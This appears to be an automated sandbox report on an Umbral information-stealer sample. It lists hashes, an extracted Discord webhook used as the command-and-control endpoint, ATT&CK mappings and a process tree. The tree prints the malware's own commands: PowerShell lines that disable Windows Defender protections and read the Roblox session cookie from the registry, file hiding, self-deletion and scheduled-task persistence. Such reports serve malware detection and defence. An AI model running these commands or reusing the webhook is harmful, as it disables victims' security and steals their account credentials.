umbral | 20be105c4a33ebf77ef4db7e8b6ebbb39b156fe1dd16473a7255903f33b76846

General

Target

loader.exe
Size

365KB
MD5

cbd720ad4f7be1c099ec22f56ee61dd6
SHA1

9989030c7ea1756e1834c464688d418e773919fc
SHA256

20be105c4a33ebf77ef4db7e8b6ebbb39b156fe1dd16473a7255903f33b76846
SHA512

2ad87fdf5046be22eec58fe71326ab0bcc2a2ca019e1b5519ec1ecbdfbb83731a254c7f400ca48cacb9917da6c85d41a913aa0f8f5b21408a3f2d1e8895e9740
SSDEEP

6144:UsLqdufVUNDa4loZM3fsXtioRkts/cnnK6cMlibJksyVtGXTOMdRYspb8e1m+Fii:PFUNDamoZ1tlRk83MlibJksyVtGXTOMX

Score

10^/10

umbral evasion execution persistence spyware stealer

Malware Config

Extracted

Family

umbral

C2

https://discordapp.com/api/webhooks/1246463015998586960/d4v_qESsKe8s7VticwxHvyytkOUO321t7x3oNxoyCNYQuwczEVfPUDFWHLnPpAM4tNJ_

Signatures

Detect Umbral payload 2 IoCs

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\loader.exe	family_umbral
behavioral1/memory/1980-11-0x0000000001360000-0x00000000013A0000-memory.dmp	family_umbral

Modifies visiblity of hidden/system files in Explorer 2 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Processes:

explorer.exesvchost.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	svchost.exe

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2780 powershell.exe
Drops file in Drivers directory 1 IoCs

Processes:

loader.exe

description ioc process

File opened for modification C:\Windows\System32\drivers\etc\hosts loader.exe
Executes dropped EXE 6 IoCs

Processes:

loader.exe icsys.icn.exeexplorer.exespoolsv.exesvchost.exespoolsv.exe

pid process

1980 loader.exe
1508 icsys.icn.exe
1360 explorer.exe
2028 spoolsv.exe
2180 svchost.exe
2852 spoolsv.exe
Loads dropped DLL 6 IoCs

Processes:

loader.exeicsys.icn.exeexplorer.exespoolsv.exesvchost.exe

pid process

1732 loader.exe
1732 loader.exe
1508 icsys.icn.exe
1360 explorer.exe
2028 spoolsv.exe
2180 svchost.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
2780	powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	loader.exe

pid	process
1980	loader.exe
1508	icsys.icn.exe
1360	explorer.exe
2028	spoolsv.exe
2180	svchost.exe
2852	spoolsv.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

explorer.exesvchost.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO"	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO"	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO"	svchost.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

6 ip-api.com

flow	ioc
6	ip-api.com

Drops file in System32 directory 2 IoCs

Processes:

explorer.exesvchost.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\explorer.exe	explorer.exe
File opened for modification	C:\Windows\SysWOW64\explorer.exe	svchost.exe

Drops file in Windows directory 5 IoCs

Processes:

explorer.exespoolsv.exeloader.exeicsys.icn.exe

description	ioc	process
File opened for modification	\??\c:\windows\resources\spoolsv.exe	explorer.exe
File opened for modification	\??\c:\windows\resources\svchost.exe	spoolsv.exe
File opened for modification	C:\Windows\Resources\tjud.exe	explorer.exe
File opened for modification	C:\Windows\Resources\Themes\icsys.icn.exe	loader.exe
File opened for modification	\??\c:\windows\resources\themes\explorer.exe	icsys.icn.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

568 schtasks.exe
2864 schtasks.exe
2460 schtasks.exe
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

wmic.exe

pid process

748 wmic.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

860 PING.EXE

pid	process
568	schtasks.exe
2864	schtasks.exe
2460	schtasks.exe

pid	process
748	wmic.exe

pid	process
860	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

loader.exeloader.exe powershell.exepowershell.exepowershell.exepowershell.exeicsys.icn.exeexplorer.exesvchost.exe

pid	process
1732	loader.exe
1732	loader.exe
1732	loader.exe
1732	loader.exe
1732	loader.exe
1732	loader.exe
1732	loader.exe
1732	loader.exe
1732	loader.exe
1732	loader.exe
1732	loader.exe
1732	loader.exe
1732	loader.exe
1732	loader.exe
1732	loader.exe
1732	loader.exe
1980	loader.exe
2780	powershell.exe
2952	powershell.exe
2688	powershell.exe
1008	powershell.exe
1508	icsys.icn.exe
1508	icsys.icn.exe
1508	icsys.icn.exe
1508	icsys.icn.exe
1508	icsys.icn.exe
1508	icsys.icn.exe
1508	icsys.icn.exe
1508	icsys.icn.exe
1508	icsys.icn.exe
1508	icsys.icn.exe
1508	icsys.icn.exe
1508	icsys.icn.exe
1508	icsys.icn.exe
1508	icsys.icn.exe
1508	icsys.icn.exe
1508	icsys.icn.exe
1508	icsys.icn.exe
1360	explorer.exe
1360	explorer.exe
1360	explorer.exe
1360	explorer.exe
1360	explorer.exe
1360	explorer.exe
1360	explorer.exe
1360	explorer.exe
1360	explorer.exe
1360	explorer.exe
1360	explorer.exe
1360	explorer.exe
1360	explorer.exe
1360	explorer.exe
1360	explorer.exe
1360	explorer.exe
2180	svchost.exe
2180	svchost.exe
2180	svchost.exe
2180	svchost.exe
2180	svchost.exe
2180	svchost.exe
2180	svchost.exe
2180	svchost.exe
2180	svchost.exe
2180	svchost.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

explorer.exesvchost.exe

pid process

1360 explorer.exe
2180 svchost.exe

pid	process
1360	explorer.exe
2180	svchost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

loader.exe wmic.exepowershell.exepowershell.exepowershell.exepowershell.exewmic.exe

description	pid	process
Token: SeDebugPrivilege	1980	loader.exe
Token: SeIncreaseQuotaPrivilege	2880	wmic.exe
Token: SeSecurityPrivilege	2880	wmic.exe
Token: SeTakeOwnershipPrivilege	2880	wmic.exe
Token: SeLoadDriverPrivilege	2880	wmic.exe
Token: SeSystemProfilePrivilege	2880	wmic.exe
Token: SeSystemtimePrivilege	2880	wmic.exe
Token: SeProfSingleProcessPrivilege	2880	wmic.exe
Token: SeIncBasePriorityPrivilege	2880	wmic.exe
Token: SeCreatePagefilePrivilege	2880	wmic.exe
Token: SeBackupPrivilege	2880	wmic.exe
Token: SeRestorePrivilege	2880	wmic.exe
Token: SeShutdownPrivilege	2880	wmic.exe
Token: SeDebugPrivilege	2880	wmic.exe
Token: SeSystemEnvironmentPrivilege	2880	wmic.exe
Token: SeRemoteShutdownPrivilege	2880	wmic.exe
Token: SeUndockPrivilege	2880	wmic.exe
Token: SeManageVolumePrivilege	2880	wmic.exe
Token: 33	2880	wmic.exe
Token: 34	2880	wmic.exe
Token: 35	2880	wmic.exe
Token: SeIncreaseQuotaPrivilege	2880	wmic.exe
Token: SeSecurityPrivilege	2880	wmic.exe
Token: SeTakeOwnershipPrivilege	2880	wmic.exe
Token: SeLoadDriverPrivilege	2880	wmic.exe
Token: SeSystemProfilePrivilege	2880	wmic.exe
Token: SeSystemtimePrivilege	2880	wmic.exe
Token: SeProfSingleProcessPrivilege	2880	wmic.exe
Token: SeIncBasePriorityPrivilege	2880	wmic.exe
Token: SeCreatePagefilePrivilege	2880	wmic.exe
Token: SeBackupPrivilege	2880	wmic.exe
Token: SeRestorePrivilege	2880	wmic.exe
Token: SeShutdownPrivilege	2880	wmic.exe
Token: SeDebugPrivilege	2880	wmic.exe
Token: SeSystemEnvironmentPrivilege	2880	wmic.exe
Token: SeRemoteShutdownPrivilege	2880	wmic.exe
Token: SeUndockPrivilege	2880	wmic.exe
Token: SeManageVolumePrivilege	2880	wmic.exe
Token: 33	2880	wmic.exe
Token: 34	2880	wmic.exe
Token: 35	2880	wmic.exe
Token: SeDebugPrivilege	2780	powershell.exe
Token: SeDebugPrivilege	2952	powershell.exe
Token: SeDebugPrivilege	2688	powershell.exe
Token: SeDebugPrivilege	1008	powershell.exe
Token: SeIncreaseQuotaPrivilege	840	wmic.exe
Token: SeSecurityPrivilege	840	wmic.exe
Token: SeTakeOwnershipPrivilege	840	wmic.exe
Token: SeLoadDriverPrivilege	840	wmic.exe
Token: SeSystemProfilePrivilege	840	wmic.exe
Token: SeSystemtimePrivilege	840	wmic.exe
Token: SeProfSingleProcessPrivilege	840	wmic.exe
Token: SeIncBasePriorityPrivilege	840	wmic.exe
Token: SeCreatePagefilePrivilege	840	wmic.exe
Token: SeBackupPrivilege	840	wmic.exe
Token: SeRestorePrivilege	840	wmic.exe
Token: SeShutdownPrivilege	840	wmic.exe
Token: SeDebugPrivilege	840	wmic.exe
Token: SeSystemEnvironmentPrivilege	840	wmic.exe
Token: SeRemoteShutdownPrivilege	840	wmic.exe
Token: SeUndockPrivilege	840	wmic.exe
Token: SeManageVolumePrivilege	840	wmic.exe
Token: 33	840	wmic.exe
Token: 34	840	wmic.exe

Suspicious use of FindShellTrayWindow 32 IoCs

Processes:

taskmgr.exe

pid	process
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe

Suspicious use of SendNotifyMessage 32 IoCs

Processes:

taskmgr.exe

pid	process
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe
2904	taskmgr.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

loader.exeicsys.icn.exeexplorer.exespoolsv.exesvchost.exespoolsv.exe

pid	process
1732	loader.exe
1732	loader.exe
1508	icsys.icn.exe
1508	icsys.icn.exe
1360	explorer.exe
1360	explorer.exe
2028	spoolsv.exe
2028	spoolsv.exe
2180	svchost.exe
2180	svchost.exe
2852	spoolsv.exe
2852	spoolsv.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

loader.exeloader.exe icsys.icn.exeexplorer.exespoolsv.exesvchost.exe

description	pid	process	target process
PID 1732 wrote to memory of 1980	1732	loader.exe	loader.exe
PID 1732 wrote to memory of 1980	1732	loader.exe	loader.exe
PID 1732 wrote to memory of 1980	1732	loader.exe	loader.exe
PID 1732 wrote to memory of 1980	1732	loader.exe	loader.exe
PID 1980 wrote to memory of 2880	1980	loader.exe	wmic.exe
PID 1980 wrote to memory of 2880	1980	loader.exe	wmic.exe
PID 1980 wrote to memory of 2880	1980	loader.exe	wmic.exe
PID 1980 wrote to memory of 2544	1980	loader.exe	attrib.exe
PID 1980 wrote to memory of 2544	1980	loader.exe	attrib.exe
PID 1980 wrote to memory of 2544	1980	loader.exe	attrib.exe
PID 1980 wrote to memory of 2780	1980	loader.exe	powershell.exe
PID 1980 wrote to memory of 2780	1980	loader.exe	powershell.exe
PID 1980 wrote to memory of 2780	1980	loader.exe	powershell.exe
PID 1980 wrote to memory of 2952	1980	loader.exe	powershell.exe
PID 1980 wrote to memory of 2952	1980	loader.exe	powershell.exe
PID 1980 wrote to memory of 2952	1980	loader.exe	powershell.exe
PID 1980 wrote to memory of 2688	1980	loader.exe	powershell.exe
PID 1980 wrote to memory of 2688	1980	loader.exe	powershell.exe
PID 1980 wrote to memory of 2688	1980	loader.exe	powershell.exe
PID 1980 wrote to memory of 1008	1980	loader.exe	powershell.exe
PID 1980 wrote to memory of 1008	1980	loader.exe	powershell.exe
PID 1980 wrote to memory of 1008	1980	loader.exe	powershell.exe
PID 1732 wrote to memory of 1508	1732	loader.exe	icsys.icn.exe
PID 1732 wrote to memory of 1508	1732	loader.exe	icsys.icn.exe
PID 1732 wrote to memory of 1508	1732	loader.exe	icsys.icn.exe
PID 1732 wrote to memory of 1508	1732	loader.exe	icsys.icn.exe
PID 1508 wrote to memory of 1360	1508	icsys.icn.exe	explorer.exe
PID 1508 wrote to memory of 1360	1508	icsys.icn.exe	explorer.exe
PID 1508 wrote to memory of 1360	1508	icsys.icn.exe	explorer.exe
PID 1508 wrote to memory of 1360	1508	icsys.icn.exe	explorer.exe
PID 1980 wrote to memory of 840	1980	loader.exe	wmic.exe
PID 1980 wrote to memory of 840	1980	loader.exe	wmic.exe
PID 1980 wrote to memory of 840	1980	loader.exe	wmic.exe
PID 1360 wrote to memory of 2028	1360	explorer.exe	spoolsv.exe
PID 1360 wrote to memory of 2028	1360	explorer.exe	spoolsv.exe
PID 1360 wrote to memory of 2028	1360	explorer.exe	spoolsv.exe
PID 1360 wrote to memory of 2028	1360	explorer.exe	spoolsv.exe
PID 2028 wrote to memory of 2180	2028	spoolsv.exe	svchost.exe
PID 2028 wrote to memory of 2180	2028	spoolsv.exe	svchost.exe
PID 2028 wrote to memory of 2180	2028	spoolsv.exe	svchost.exe
PID 2028 wrote to memory of 2180	2028	spoolsv.exe	svchost.exe
PID 2180 wrote to memory of 2852	2180	svchost.exe	spoolsv.exe
PID 2180 wrote to memory of 2852	2180	svchost.exe	spoolsv.exe
PID 2180 wrote to memory of 2852	2180	svchost.exe	spoolsv.exe
PID 2180 wrote to memory of 2852	2180	svchost.exe	spoolsv.exe
PID 1360 wrote to memory of 764	1360	explorer.exe	Explorer.exe
PID 1360 wrote to memory of 764	1360	explorer.exe	Explorer.exe
PID 1360 wrote to memory of 764	1360	explorer.exe	Explorer.exe
PID 1360 wrote to memory of 764	1360	explorer.exe	Explorer.exe
PID 1980 wrote to memory of 688	1980	loader.exe	wmic.exe
PID 1980 wrote to memory of 688	1980	loader.exe	wmic.exe
PID 1980 wrote to memory of 688	1980	loader.exe	wmic.exe
PID 2180 wrote to memory of 568	2180	svchost.exe	schtasks.exe
PID 2180 wrote to memory of 568	2180	svchost.exe	schtasks.exe
PID 2180 wrote to memory of 568	2180	svchost.exe	schtasks.exe
PID 2180 wrote to memory of 568	2180	svchost.exe	schtasks.exe
PID 1980 wrote to memory of 1432	1980	loader.exe	wmic.exe
PID 1980 wrote to memory of 1432	1980	loader.exe	wmic.exe
PID 1980 wrote to memory of 1432	1980	loader.exe	wmic.exe
PID 1980 wrote to memory of 444	1980	loader.exe	powershell.exe
PID 1980 wrote to memory of 444	1980	loader.exe	powershell.exe
PID 1980 wrote to memory of 444	1980	loader.exe	powershell.exe
PID 1980 wrote to memory of 748	1980	loader.exe	wmic.exe
PID 1980 wrote to memory of 748	1980	loader.exe	wmic.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

2544 attrib.exe

pid	process
2544	attrib.exe

C:\Users\Admin\AppData\Local\Temp\loader.exe
"C:\Users\Admin\AppData\Local\Temp\loader.exe"
1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1732

\??\c:\users\admin\appdata\local\temp\loader.exe
c:\users\admin\appdata\local\temp\loader.exe
2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1980

C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2880

C:\Windows\system32\attrib.exe
"attrib.exe" +h +s "c:\users\admin\appdata\local\temp\loader.exe "
3⤵
- Views/modifies file attributes
PID:2544

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'c:\users\admin\appdata\local\temp\loader.exe '
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2780

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2952

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1008

C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:840

C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
3⤵
PID:688

C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
3⤵
PID:1432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
3⤵
PID:444

C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
3⤵
- Detects videocard installed
PID:748

C:\Windows\system32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "c:\users\admin\appdata\local\temp\loader.exe " && pause
3⤵
PID:920

C:\Windows\system32\PING.EXE
ping localhost
4⤵
- Runs ping.exe
PID:860

C:\Windows\Resources\Themes\icsys.icn.exe
C:\Windows\Resources\Themes\icsys.icn.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1508

\??\c:\windows\resources\themes\explorer.exe
c:\windows\resources\themes\explorer.exe
3⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1360

\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe SE
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2028

\??\c:\windows\resources\svchost.exe
c:\windows\resources\svchost.exe
5⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2180

\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe PR
6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2852

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 01:25 /f
6⤵
- Creates scheduled task(s)
PID:568

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 01:26 /f
6⤵
- Creates scheduled task(s)
PID:2864

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 01:27 /f
6⤵
- Creates scheduled task(s)
PID:2460

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe
4⤵
PID:764

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2904

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

Scheduled Task/Job

Defense Evasion

Hide Artifacts

2

T1564

Hidden Files and Directories

Modify Registry

Credential Access

Unsecured Credentials

1

T1552

Credentials In Files

1

T1552.001

Discovery

Remote System Discovery

1

T1018

System Information Discovery

1

T1082

Lateral Movement

Collection

Data from Local System

1

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
96a54d676e2baa2553ade3750cec02f4

SHA1
69753b28186e40362ff98d4647a847e77ab6d697

SHA256
43bafa793385ea82f193391a7fd9475963fe8522a4e78d4716e54af06f7b5c09

SHA512
f5fc6d98335546e836677dc919c9f6ff403a480ab83dc3c437ad0f60fef66a25e6e5f2dc1f67a475e2e1989cfeabbaf3e0921322585db6b11fe62ec13b7ac0d4

Download Submit
C:\Windows\Resources\Themes\explorer.exe
Filesize
135KB

MD5
afba798122a15e6aae67a6bdaf8e2e7e

SHA1
81735fd8afb767c6045e06788281dd9bc3085a59

SHA256
a70b1ab1b6ea33dba6c3c3b09ef85b73724a5ba0b13474704d0190747188d868

SHA512
9c34b3dc629395af94012ee50f1005ddbc4d169028f24593e6b1ef72a481ff906c5c91c1c961d7ee242597762f509cc43ab04e8c0f02649313a173b8e68629d1

Download Submit
\Users\Admin\AppData\Local\Temp\loader.exe
Filesize
230KB

MD5
d23ca81d16873706f5e26fbac64eaee9

SHA1
c49585cbcc6e5286fba1c7a3fe582ea0e38ed5ee

SHA256
007ae5e7086ce92765cb6f3877663b04146f14deba2edb9582d90d4451b443d7

SHA512
4a7d4be3f7a1e27e9c925b57a5e53754f8f39ebabf479e041f620ef5271a7154fe57a407ff59f859f02f149bb60925e2f4e2c9c49f415fd42e780c7ea23922d4

Download Submit
\Windows\Resources\Themes\icsys.icn.exe
Filesize
135KB

MD5
b6c6d532091f6de047c1a68a4b69bf10

SHA1
01439b14f2158014ef0255092f4c11a136483889

SHA256
39931e1f612c4cc3ddef588ce4a1d1c1543e85cf16959eb738ed39eb0b2b1a11

SHA512
b652116e7a2ebe98cb8e43d024542fdb5c8daccf85dde4c00738eedd55d7a1195155ed4b4ea26fd8e91ce1bbef54c9cd224cd4606b2028168e82c0c2de45798d

Download Submit
\Windows\Resources\spoolsv.exe
Filesize
135KB

MD5
edeb7cad4dbe346275bf15847a7f1e17

SHA1
40693dcb7121547f2fd538249949e5643117c0e4

SHA256
57d0a4608d50845fadc0b78fa7b9268a334bf76ac55a17874ba2bda0cf874d45

SHA512
be8cc6b127a5672949f3086b88496d5eef76b709bbb7dd919b55efe234f1fe6a93c5f0013d9415e4ddb1c5dd524d1c03df9f87888456ac2f8471c0ea1c04d5ab

Download Submit
\Windows\Resources\svchost.exe
Filesize
135KB

MD5
206311e7229da01362389b3ec534aa21

SHA1
adb9c05b7ca1a0a3f87f1c21d8b74d029db3eb17

SHA256
caf34ea25cf7a68c3bc5dfb0235d27db0622c1a34dce85e85a931566f63c2455

SHA512
55f522b8edd6f517e8401ec0cdd18f44f96c4ab3225c9d3625b46cf3a6050875e6107b632ed93a472468c4d881a7895206b3afc86d82f0dcc693a7c4c5112f62

Download Submit
memory/444-104-0x0000000001E90000-0x0000000001E98000-memory.dmp

Filesize
32KB

Download
memory/1508-97-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/1732-46-0x00000000002F0000-0x000000000030F000-memory.dmp

Filesize
124KB

Download
memory/1732-98-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/1732-0-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/1980-88-0x000007FEF60C0000-0x000007FEF6AAC000-memory.dmp

Filesize
9.9MB

Download
memory/1980-12-0x000007FEF60C0000-0x000007FEF6AAC000-memory.dmp

Filesize
9.9MB

Download
memory/1980-108-0x000007FEF60C0000-0x000007FEF6AAC000-memory.dmp

Filesize
9.9MB

Download
memory/1980-10-0x000007FEF60C3000-0x000007FEF60C4000-memory.dmp

Filesize
4KB

Download
memory/1980-11-0x0000000001360000-0x00000000013A0000-memory.dmp

Filesize
256KB

Download
memory/1980-80-0x000007FEF60C3000-0x000007FEF60C4000-memory.dmp

Filesize
4KB

Download
memory/2028-81-0x00000000002D0000-0x00000000002EF000-memory.dmp

Filesize
124KB

Download
memory/2028-96-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/2180-90-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/2780-17-0x000000001B4C0000-0x000000001B7A2000-memory.dmp

Filesize
2.9MB

Download
memory/2780-18-0x0000000002890000-0x0000000002898000-memory.dmp

Filesize
32KB

Download
memory/2852-95-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/2904-109-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2904-110-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2952-25-0x0000000002240000-0x0000000002248000-memory.dmp

Filesize
32KB

Download
memory/2952-24-0x000000001B630000-0x000000001B912000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads